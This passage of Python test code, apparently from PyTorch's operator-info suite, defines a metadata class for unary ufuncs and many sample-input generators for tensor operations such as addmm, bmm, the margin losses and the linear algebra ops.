generate_elementwise_unary_noncontiguous_tensors( op, device=device, dtype=dtype, 
requires_grad=requires_grad, **kwargs ) yield from generate_elementwise_unary_arbitrarily_strided_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) # Metadata class for unary "universal functions (ufuncs)" that accept a single # tensor and have common properties like: class UnaryUfuncInfo(OpInfo): """Operator information for 'universal unary functions (unary ufuncs).' These are functions of a single tensor with common properties like: - they are elementwise functions - the input shape is the output shape - they typically have method and inplace variants - they typically support the out kwarg - they typically have NumPy or SciPy references See NumPy's universal function documentation (https://numpy.org/doc/1.18/reference/ufuncs.html) for more details about the concept of ufuncs. """ def __init__( self, name, # the string name of the function *, ref, # a reference function dtypes=floating_types(), dtypesIfCUDA=None, dtypesIfROCM=None, domain=(None, None), # the [low, high) domain of the function handles_complex_extremal_values=True, # whether the op correctly handles extremal values (like nan/inf) handles_large_floats=True, # whether the op correctly handles large float values (like 1e20) supports_complex_to_float=False, # op supports casting from complex input to real output safely eg. angle sample_inputs_func=sample_inputs_elementwise_unary, reference_inputs_func=reference_inputs_elementwise_unary, sample_kwargs=lambda device, dtype, input: ({}, {}), supports_sparse=False, reference_numerics_filter=None, # Filters values in the range of the domain specified above but that should not be tested **kwargs, ): self._original_unary_ufunc_args = locals().copy() super(UnaryUfuncInfo, self).__init__( name, dtypes=dtypes, dtypesIfCUDA=dtypesIfCUDA, dtypesIfROCM=dtypesIfROCM, sample_inputs_func=sample_inputs_func, reference_inputs_func=reference_inputs_func, supports_sparse=supports_sparse, **kwargs, ) self.ref = ref self.domain = domain self.handles_complex_extremal_values = handles_complex_extremal_values self.handles_large_floats = handles_large_floats self.supports_complex_to_float = supports_complex_to_float self.reference_numerics_filter = reference_numerics_filter # test_unary_ufuncs.py generates its own inputs to test the consistency # of the operator on sliced tensors, non-contig tensors, etc. # `sample_kwargs` is a utility function to provide kwargs # along with those inputs if required (eg. clamp). # It should return two dictionaries, first holding kwarg for # torch operator and second one for reference NumPy operator. self.sample_kwargs = sample_kwargs # Epsilon to ensure grad and gradgrad checks don't test values # outside a function's domain. 
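# For example, an op like asin with domain (-1, 1) is sampled from
# [-1 + 1e-5, 1 - 1e-5], keeping finite-difference perturbations in-domain.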
self._domain_eps = 1e-5 def sample_inputs_add_sub(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Adds alpha kwarg cases make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) if dtype is not torch.bool: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': 2}) else: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': True}) neg_alpha = -3.14 if (dtype.is_floating_point or dtype.is_complex) else -3 lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) if dtype is not torch.bool: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': neg_alpha}) else: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': False}) def sample_inputs_isclose(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Creates additional inputs to test the rtol, atol, and equal_nan params rtols = [0., 1e-7] atols = [0., 1e-7] equal_nans = [False, True] products = product(rtols, atols, equal_nans) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for rtol, atol, equal_nan in products: lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) yield SampleInput(lhs, args=(rhs,), kwargs=dict(rtol=rtol, atol=atol, equal_nan=equal_nan)) def sample_inputs_t(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return (SampleInput(make_arg((1, 2))), SampleInput(make_arg((2,))), SampleInput(make_arg(()))) def sample_inputs_mm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_arg_conj(size): return make_arg(size).conj().requires_grad_(requires_grad) first_shape, second_shape = (S, M), (M, S) yield SampleInput(make_arg(first_shape), args=(make_arg(second_shape),)) if dtype.is_complex: yield SampleInput(make_arg(first_shape), args=(make_arg_conj(second_shape),)) def sample_inputs_addmm(op_info, device, dtype, requires_grad, **kwargs): alpha_val = kwargs.get('alpha', 2 + 3j if dtype.is_complex else 0.6) beta_val = kwargs.get('beta', 1 + 2j if dtype.is_complex else 0.2) tests_list = [ ((2, 3), (2, 2), (2, 3), False) ] tests_with_lhs_broadcasting = [ ((1,), (2, 2), (2, 3), True), ((), (2, 2), (2, 3), True) ] test_cases = tests_list + tests_with_lhs_broadcasting # type: ignore[operator] sample_inputs = [] for shape_a, shape_b, shape_c, broadcasts_input in test_cases: sample_inputs.append( SampleInput( make_tensor(shape_a, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape_b, dtype=dtype, device=device, requires_grad=requires_grad), make_tensor(shape_c, dtype=dtype, device=device, requires_grad=requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val}, broadcasts_input=broadcasts_input)) if dtype.is_complex: shape = (3, 3) sample_inputs.append( SampleInput(make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape, dtype=dtype, device=device).mH.requires_grad_(requires_grad), make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val},)) sample_inputs.append( 
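# Mirrored case: this sample conjugate-transposes the second matrix operand
# instead of the first, so both operands' conjugate paths get coverage.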
SampleInput(make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), make_tensor(shape, dtype=dtype, device=device).mH.requires_grad_(requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val},)) return sample_inputs def sample_inputs_sparse_sampled_addmm(op_info, device, dtype, requires_grad, **kwargs): alpha = 2 + 3j if dtype.is_complex else 0.6 beta = 1 + 2j if dtype.is_complex else 0.2 def generator(): # sparse.sampled_addmm performs: alpha * (A @ B) * sparse_ones_like(C) + beta * C for m, n, k in itertools.product([0, 5], repeat=3): yield SampleInput( torch.eye(m, n, device=device, dtype=dtype) .to_sparse_csr() .requires_grad_(requires_grad), args=( make_tensor( (m, k), device=device, dtype=dtype, requires_grad=requires_grad, ), make_tensor( (k, n), device=device, dtype=dtype, requires_grad=requires_grad, ), ), kwargs={"alpha": alpha, "beta": beta}, ) return list(generator()) def sample_inputs_mv(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((S, M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) ), ) def sample_inputs_bmm(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((M, S, M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((M, M, S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) ), ) def sample_inputs_dot_vdot(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_arg_conj(size): return make_arg(size).conj().requires_grad_(requires_grad) sample_inputs = [] sample_inputs.append(SampleInput(make_arg((S, )), args=(make_arg((S, )),))) if dtype.is_complex: # dot/vdot for (conj(input), conj(arg_tensor)) and (conj(input), arg_tensor) # is tested in test_conj_view (which tests operations with only conjugated input tensor # -- not conjugated arg tensors) sample_inputs.append(SampleInput(make_arg((S, )), args=(make_arg_conj((S, )),))) return sample_inputs def sample_inputs_addmv(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases = (((S,), (S, M), (M,), 1, 1, False), ((S,), (S, M), (M,), 0.2, 0.6, False), ) test_cases_with_broadcast = (((1,), (S, M), (M,), 1, 1, True), ((1,), (S, M), (M,), 0.2, 0.6, True), ((), (S, M), (M,), 1, 1, True), ((), (S, M), (M,), 0.2, 0.6, True), ) cases = test_cases + test_cases_with_broadcast # addmv performs: beta * M + alpha * (mat @ vec) for size, mat, vec, beta, alpha, broadcasts_input in cases: yield SampleInput(make_arg(size), args=(make_arg(mat), make_arg(vec)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=broadcasts_input) def sample_inputs_addbmm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input_shape, batch1_shape, batch2_shape, beta_val, alpha_val, is_broadcasting test_cases = [((S, M), (S, S, S), (S, S, M), 1, 1, False), ((1,), (S, S, S), (S, S, M), 1, 1, True), ((S, M), (S, S, S), (S, S, M), 0.6, 0.2, False), ((1,), (S, S, S), (S, S, M), 0.6, 0.2, True), ((), (S, S, S), (S, S, M), 1, 1, True), ((), (S, S, S), (S, S, M), 0.6, 0.2, True), ] for input_shape, 
batch1_shape, batch2_shape, beta, alpha, is_broadcasting in test_cases: if dtype.is_complex: beta_complex, alpha_complex = beta * (1 + 2j), alpha * (2 + 3j) yield SampleInput(make_arg(input_shape), args=(make_arg(batch1_shape), make_arg(batch2_shape)), kwargs=dict(beta=beta_complex, alpha=alpha_complex), broadcasts_input=is_broadcasting) yield SampleInput(make_arg(input_shape), args=(make_arg(batch1_shape), make_arg(batch2_shape)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=is_broadcasting) def sample_inputs_addcmul_addcdiv(op_info, device, dtype, requires_grad, **kwargs): test_cases = [(((S, S), (S, S), (S, S)), False), (((S, S), (S, 1), (1, S)), False), (((1,), (S, S, 1), (1, S)), True), (((), (), ()), False), (((S, S), (), ()), True), (((), (S, S, 1), (1, S)), True) ] sample_inputs = [] for input_args, broadcasts_input in test_cases: # addcdiv should accept inputs with zero value # Currently, it throws ZeroDivisionError when the denominator is zero # TODO: exclude_zeros can be removed after https://github.com/pytorch/pytorch/issues/73638 is fixed args = tuple(make_tensor(arg, dtype=dtype, device=device, requires_grad=requires_grad, exclude_zero=True) if isinstance(arg, tuple) else arg for arg in input_args) sample_inputs.append(SampleInput( args[0], args=args[1:], broadcasts_input=broadcasts_input)) # addcdiv should accept inputs with zero value # Currently, it throws ZeroDivisionError when the denominator is zero # TODO: exclude_zeros can be removed after https://github.com/pytorch/pytorch/issues/73638 is fixed args = tuple(make_tensor(arg, dtype=dtype, device=device, requires_grad=requires_grad, exclude_zero=True) if isinstance(arg, tuple) else arg for arg in input_args) sample_inputs.append(SampleInput( args[0], args=args[1:], kwargs=dict(value=3.14), broadcasts_input=broadcasts_input)) return tuple(sample_inputs) def sample_inputs_baddbmm(op_info, device, dtype, requires_grad, **kwargs): test_cases = [((S, S, M), (S, S, S), (S, S, M), 1, 1, False), ((1,), (S, S, S), (S, S, M), 1, 1, True), ((S, S, M), (S, S, S), (S, S, M), 0.6, 0.2, False), ((1,), (S, S, S), (S, S, M), 0.6, 0.2, True), ((), (S, S, S), (S, S, M), 1, 1, True), ((), (S, S, S), (S, S, M), 0.6, 0.2, True), ] sample_inputs = [] for (input_shape, batch1_shape, batch2_shape, alpha, beta, broadcasts_input) in test_cases: args = (make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(batch1_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(batch2_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) sample_inputs.append(SampleInput(args[0], args=(args[1], args[2]), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=broadcasts_input)) if dtype.is_complex: sample_inputs.append(SampleInput( args[0].clone().requires_grad_(requires_grad), args=(args[1].clone().requires_grad_(requires_grad), args[2].clone().requires_grad_(requires_grad)), kwargs=dict(beta=beta * (1 + 2j), alpha=alpha * (2 + 3j)), broadcasts_input=broadcasts_input)) if dtype.is_complex: shapes = [(S, S, S), (S, M, S), (S, S, M)] args = (make_tensor(shapes[0], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(shapes[1], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(shapes[2], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) sample_inputs.append( SampleInput( args[0].transpose_(-1, 1), 
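# The in-place transpose_ makes the input noncontiguous; the batch operands
# below are transposed and conjugated to exercise the conj(transpose) path.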
args=(args[1].transpose(-1, 1).conj().requires_grad_(requires_grad), args[2].transpose(-1, 1).conj().requires_grad_(requires_grad)), kwargs=dict(beta=beta * (1 + 2j), alpha=alpha * (2 + 3j)),)) return tuple(sample_inputs) # TODO: add reduction kwargs def sample_inputs_multilabel_soft_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( (S,), (S, S), ) for shape in shapes: # Produce one with weight and one without. yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False),), kwargs={}) yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False),), kwargs={'weight': _make_tensor(shape, requires_grad=False)}) def sample_inputs_addr(op_info, device, dtype, requires_grad, **kwargs): yield SampleInput( make_tensor((S, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad))) yield SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), broadcasts_input=True) if dtype.is_complex: alpha, beta = 0.1 + 0.3j, 0.4 + 0.6j elif dtype.is_floating_point: alpha, beta = 0.2, 0.6 else: alpha, beta = 2, 3 yield SampleInput( make_tensor((S, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), kwargs=dict(beta=beta, alpha=alpha)) yield SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=True) # These samples fail gradcheck if dtype.is_floating_point and not requires_grad: yield SampleInput( torch.tensor([[math.nan]], device=device, requires_grad=requires_grad), args=( torch.tensor([0.0], device=device, requires_grad=requires_grad), torch.tensor([0.0], device=device, requires_grad=requires_grad), ), kwargs=dict(beta=0.0, alpha=0.0), broadcasts_input=True) yield SampleInput( torch.tensor([[0.0]], device=device, requires_grad=requires_grad), args=( torch.tensor([math.nan], device=device, requires_grad=requires_grad), torch.tensor([math.nan], device=device, requires_grad=requires_grad), ), kwargs=dict(beta=0.0, alpha=0.0), broadcasts_input=True) def sample_inputs_zero_(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ((), (S, S, S), (S,)) for shape in cases: yield(SampleInput(make_arg(shape))) # TODO: add reduction kwargs def sample_inputs_multi_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_target = partial(_make_tensor, 
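# targets hold class indices, hence the long dtype and no gradient requirement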
dtype=torch.long, requires_grad=False) inputs = ( ((), make_target([], low=0, high=1), {}), ((S,), make_target([], low=0, high=S), {"p": 1}), ((S,), make_target([1], low=0, high=S), {"p": 2}), ((S, M), make_target([S], low=0, high=M), {"margin": 1.0}), ((M, S), make_target([M], low=0, high=S), {"weight": None}), ) for input_shape, target, kwargs in inputs: yield SampleInput(_make_tensor(input_shape), args=(target,), kwargs=kwargs) def sample_inputs_logsumexp(self, device, dtype, requires_grad, **kwargs): inputs = ( ((), (0,), True), ((S, S), (1,), True), ((S, S), (1,), False), ((S, S), (-2,), False), ) samples = [] # Test large inputs to check numerical stability lows = (None, 1e3, 1e6) if dtype in (torch.float32, torch.float64) else (None,) for low in lows: high = low * 2 if low is not None else None for shape, dim, keepdim in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) samples.append(SampleInput(t, args=(dim, keepdim))) return tuple(samples) def sample_inputs_like_fns(self, device, dtype, requires_grad, **kwargs): inputs = [ ((), {}), ((S, S), {}), ((0, S, 0), {}), ((S,), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices. We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), {'dtype': torch.double}), ((S,), {'device': 'cpu'}), ((S,), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), {'device': 'cuda'})) samples = [] for shape, kwargs in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, kwargs=kwargs)) return tuple(samples) def reference_inputs_like_fns(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_like_fns(op, device, dtype, requires_grad, **kwargs) # shape cases = ( (), (0,), (1, 0), (1, 1, 4, 5), (5, 3, 0, 1), (1, 4, 3, 1, 1) ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in cases: yield SampleInput(make_arg(shape)) yield SampleInput(make_arg(shape).transpose(0, -1)) yield SampleInput(make_arg(shape, noncontiguous=True)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1)) # TODO: add reduction kwargs def sample_inputs_multilabel_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_target = partial(_make_tensor, dtype=torch.long, requires_grad=False) inputs = ( ([], make_target([], low=0, high=1)), ([S], make_target([S], low=0, high=S)), ([M, S], make_target([M, S], low=0, high=S)), ) for shape, target in inputs: yield SampleInput(_make_tensor(shape), args=(target,)) def get_independent_tensor(tensor): return tensor.clone().requires_grad_(tensor.requires_grad) def sample_inputs_randint_like(self, device, dtype, requires_grad, **kwargs): samples = [] low = 2 high = 10 for sample in sample_inputs_like_fns(self, device, dtype, requires_grad, **kwargs): # With high samples.append(SampleInput( sample.input, args=(high,) + sample.args, kwargs=sample.kwargs)) # With low and high samples.append(SampleInput( get_independent_tensor(sample.input), args=(low, high,) + sample.args, kwargs=sample.kwargs)) return tuple(samples) def sample_inputs_margin_ranking_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( (), (S,), (S, S), (S, 
S, S), ) margins = (0., 1.) reductions = ('sum', 'mean', 'none') for shape in shapes: for margin, reduction in product(margins, reductions): kwargs = {'margin': margin, 'reduction': reduction} yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False), _make_tensor(shape, requires_grad=False)), kwargs=kwargs) def reference_inputs_margin_ranking_loss(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_margin_ranking_loss(op, device, dtype, requires_grad, **kwargs) make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for reduction in ('sum', 'mean', 'none'): if dtype.is_floating_point: # only supports ints and floats # NaN propagation inp1 = make_input((10, )) inp1[2] = float('nan') inp2 = make_input((10, )) inp2[4] = float('nan') target = make_input((10, )) target[9] = float('nan') yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction}) # Inf handling inp1 = make_input((10, )) inp1[1] = float('inf') inp2 = make_input((10, )) inp2[4] = float('inf') target = make_input((10, )) target[7] = float('inf') yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction}) # Broadcasting inp1 = make_input((5, 2)) inp2 = make_input((5, 1)) target = make_input((1, 2)) yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction}) def error_inputs_margin_ranking_loss(op, device, **kwargs): make_input = partial(make_tensor, device=device, dtype=torch.float32) # invalid reduction value. yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4), make_input(5, 4),), kwargs={'reduction': 'abc'}), error_type=ValueError, error_regex='is not a valid value') # invalid input shapes yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4), make_input(5,),)), error_regex='margin_ranking_loss : All input tensors should') def sample_inputs_new_fns(self, device, dtype, requires_grad, **kwargs): inputs = [ ((), (), {}), ((S, S), (2, 0), {}), ((0, S, 0), (3, 2, 2), {}), ((S,), (2, 3), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices.
We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), (10,), {'dtype': torch.double}), ((S,), (1, 1, 12), {'device': 'cpu'}), ((S,), (2, 2, 2), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), (7, 2), {'device': 'cuda'})) samples = [] for input_shape, output_shape, kwargs in inputs: t = make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(output_shape,), kwargs=kwargs)) return tuple(samples) def sample_inputs_empty(op, device, dtype, requires_grad, **kwargs): # shape cases = ( (), (0,), (1,), (1, 3, 5), (5, 3, 1), (1, 0, 5, 1), ) for case in cases: _kwargs = {'device': device, 'dtype': dtype, 'requires_grad': requires_grad} yield SampleInput(case, args=(), kwargs=_kwargs) def sample_inputs_new_full(self, device, dtype, requires_grad, **kwargs): def get_val(dtype): return make_tensor([], dtype=dtype, device="cpu").item() samples = [] for sample in sample_inputs_new_fns(self, device, dtype, requires_grad, **kwargs): # The scalar we are passing to new_full must be the same dtype # as the one of the resulting tensor use_dtype = sample.kwargs['dtype'] if 'dtype' in sample.kwargs else dtype samples.append(SampleInput( sample.input, args=sample.args + (get_val(use_dtype),), kwargs=sample.kwargs)) return tuple(samples) def sample_inputs_full_like(self, device, dtype, requires_grad, **kwargs): def get_val(dtype): return make_tensor([], dtype=dtype, device="cpu").item() inputs = [ ((), get_val(dtype), {}), ((S, S), get_val(dtype), {}), ((0, S, 0), get_val(dtype), {}), ((S,), get_val(dtype), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices. We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), get_val(torch.double), {'dtype': torch.double}), ((S,), get_val(dtype), {'device': 'cpu'}), ((S,), get_val(torch.double), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), get_val(dtype), {'device': 'cuda'})) samples = [] for shape, fill_value, kwargs in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(fill_value,), kwargs=kwargs)) return tuple(samples) def sample_inputs_multinomial(self, device, dtype, requires_grad, **kwargs): cases = [ ([3], 3, dict()), ([10], 3, dict()), ([3, 10], 3, dict()), ([3], 3, dict(replacement=False)), ([3], 3, dict(replacement=True)), ([3, 4], 4, dict(replacement=True)), ([3, 4], 4, dict(replacement=False)), ] samples = [] for shape, num_samples, kwargs in cases: t = make_tensor(shape, dtype=dtype, device=device, low=0, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(num_samples,), kwargs=kwargs)) return tuple(samples) def sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs): def get_value_or_make_tensor(value_or_shape): if isinstance(value_or_shape, list): return make_tensor(value_or_shape, dtype=dtype, device=device, low=0, high=None, requires_grad=requires_grad) return value_or_shape samples = [] for value_or_mean_shape, value_or_std_shape, kwargs in cases: mean = get_value_or_make_tensor(value_or_mean_shape) std = get_value_or_make_tensor(value_or_std_shape) samples.append(SampleInput(mean, args=(std,), kwargs=kwargs)) return tuple(samples) def sample_inputs_normal_tensor_first(self, device, dtype, requires_grad, **kwargs): # 
value_or_size, value_or_size, kwargs cases = [ ([], [], {}), ([3], [3], {}), ([3, 4, 2], [3, 4, 2], {}), ([2, 3], 1.1, {}), ([1, 2, 3], [5, 2, 3], {}), # broadcasting ] return sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs) def sample_inputs_normal_tensor_second(self, device, dtype, requires_grad, **kwargs): cases = [ ([3, 4], 0.3, {}), ] return sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs) def sample_inputs_bernoulli(self, device, dtype, requires_grad, **kwargs): shapes = [ [3], [], [0, 3], [2, 3, 4], ] samples = [] for shape in shapes: t = make_tensor(shape, dtype=dtype, device=device, low=0, high=1, requires_grad=requires_grad) samples.append(SampleInput(t)) return tuple(samples) def sample_inputs_logcumsumexp(self, device, dtype, requires_grad, **kwargs): inputs = ( ((S, S, S), 0), ((S, S, S), 1), ((), 0), ) samples = [] for large_number in (True, False): for shape, dim in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if large_number and t.dim() > 0: t[0] = 10000 samples.append(SampleInput(t, args=(dim,))) return tuple(samples) def sample_inputs_trace(self, device, dtype, requires_grad, **kwargs): return (SampleInput((make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad))),) def sample_inputs_renorm(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (2, 1, 0.5)), ((S, S, S), (2, -1, 0.5)), ((S, S, S), (1, 2, 3)), ((S, S, S), (float('inf'), 2, 0.5)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_transpose_swapdims(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((1, 2, 3), (-1, -2)), ((1, 2, 3), (-1, 2)), ((1, 2, 3), (1, -2)), ((1, 2, 3), (1, 2)), ((), (0, 0)), ((1, ), (0, 0)), ((M, M), (0, 1)), ((S, S, S), (2, 0)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def _numpy_ref_transpose(a, dim0, dim1): if a.ndim <= 1: return a return np.swapaxes(a, dim0, dim1) def sample_inputs_adjoint(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((1, 2, 3), (), (M, M), (S, S, S), (S, M, S), (M, S, M, S)) return (SampleInput(make_arg(shape)) for shape in shapes) def sample_inputs_T(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((), (M, M)) return (SampleInput(make_arg(shape)) for shape in shapes) def sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates invertible inputs for linear algebra ops The input is generated as the itertools.product of 'batches' and 'ns'. In total this function generates 8 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices, (1, 1) - 1x1 batch of matrices 'ns' gives 0x0 and 5x5 matrices. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. 
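For example, batch=(2,) with n=5 yields a batch of two invertible 5x5
matrices, while batch=(0,) with n=0 exercises the fully degenerate case.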
""" make_fn = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fn, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0, ), (2, ), (1, 1)] ns = [5, 0] for batch, n in product(batches, ns): yield SampleInput(make_arg(*batch, n, n)) def sample_inputs_linalg_pinv_singular(op_info, device, dtype, requires_grad=False, **kwargs): """ This function produces factors `a` and `b` to generate inputs of the form `a @ b.t()` to test the backward method of `linalg_pinv`. That way we always preserve the rank of the input no matter the perturbations applied to it by the gradcheck. Note that `pinv` is Frechet-differentiable in a rank-preserving neighborhood. """ batches = [(), (0, ), (2, ), (1, 1)] # the size of at least 30 is required to cause failures for the previous implicit implementation # of the pinv's backward method, albeit it is slow. size = [0, 3, 50] for batch, m, n in product(batches, size, size): for k in range(min(3, min(m, n))): # Note that by making the columns of `a` and `b` orthonormal we make sure that # the product matrix `a @ b.t()` has condition number 1 when restricted to its image a = torch.rand(*batch, m, k, device=device, dtype=dtype).qr().Q.requires_grad_(requires_grad) b = torch.rand(*batch, n, k, device=device, dtype=dtype).qr().Q.requires_grad_(requires_grad) yield SampleInput(a, args=(b,)) def sample_inputs_singular_matrix_factors(op_info, device, dtype, requires_grad=False, **kwargs): """ This function produces two tensors of shape (*, m, k) and (*, n, k) with k <= min(m, n). Their matrix product could be used to generate tensor of shape (*, m, n) of rank k. """ batches = [(), (0, ), (2, ), (1, 1)] size = [1, 5, 10] for batch, m, n in product(batches, size, size): for k in range(min(3, min(m, n))): a = make_tensor((*batch, m, k), dtype=dtype, device=device, requires_grad=requires_grad) b = make_tensor((*batch, n, k), dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(a, args=(b,), kwargs=kwargs) def clone_sample(sample, **kwargs): """ Given a SampleInput, this function analyzes its input, args and kwargs, and produces a copy with each non-Tensor entry being copied by reference, and with each Tensor entry cloned with `t.clone().requires_grad_(t.requires_grad)` """ def clone_tensor(t): if isinstance(t, torch.Tensor): return t.detach().clone().requires_grad_(t.requires_grad) else: return t sample_kwargs = kwargs if kwargs else sample.kwargs return SampleInput( clone_tensor(sample.input), args=tuple(map(clone_tensor, sample.args)), kwargs=dict(((k, clone_tensor(v)) for k, v in sample_kwargs.items())) ) def sample_inputs_svd_lowrank(op_info, 